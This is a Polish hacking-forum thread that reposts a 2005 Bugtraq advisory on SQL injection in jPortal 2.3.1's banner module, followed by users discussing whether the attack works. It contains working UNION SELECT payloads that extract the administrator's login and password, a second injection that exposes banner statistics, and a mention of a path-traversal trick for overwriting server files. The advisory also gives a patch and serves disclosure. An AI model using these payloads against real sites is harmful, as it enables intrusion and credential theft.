Bugtraq

[ra-v]

Otóz ciekaw jestem czy ten BugTraq dziala

oto jego zawartośc

 

Hello BugTraq,

 

I've found possibility to inject sql code in jPortal version 2.3.1, in

module "banner" (module/banner.inc.php).

 

Bug is in these lines of code:

$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";

- line 192.

 

There is unfiltered variable $haslo. In order to patch this code just do this:

$haslo = addslashes($haslo);$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";

[exploit]

go to http://[victim]/jportal/banner.php and try this:

 

' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,

NULL, NULL, NULL, NULL, NULL from admins where '1=1

 

and then:

 

' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,

NULL, NULL, NULL, NULL, NULL from admins where '1=1

 

After that, You gain login and password of administrator.

[/exploit]

 

[exploit2]

try to inject this code:

' or id='x x - banner id

After that, You can see statistics of not banners, to which you

haven't got passwords.

[/exploit2]

źródło : http://seclists.org/lists/bugtraq/2005/Apr/0143.html

 

Co prawda tekst w jezyku angelskim ale łatwo sie połapać o co chodzi...

prbowałem tej metody ale niestety nie działa... i co wy na to ???

[ParanoiK]

Jak testowałem na świeżo postawionej wersji (tylko nie pamiętam której) to działała ;]

Zresztą drugi inject dotyczący print.php też ;]

[ra-v]

ale ParanoiK wiesz gdzie wpisać te kody ???

[ParanoiK]

Wszystko masz opisane ;]

[~blacksheep]

Nie jest to pierwszy i ostatni bug w jportalu, chociaż w najnowszej wersji już poprawili. W ogóle jak sobie poczytałem kod to jest co najmniej dziwny - np. zapisywanie timestampów w /online_x zamiast w bazie danych. No, ale dobre bo polskie ;). Kiedyś dało się jeszcze zarejestrować jako użytkownik '../../jakiś_plil' i nadpisywać w ten sposób pliki na serwerze.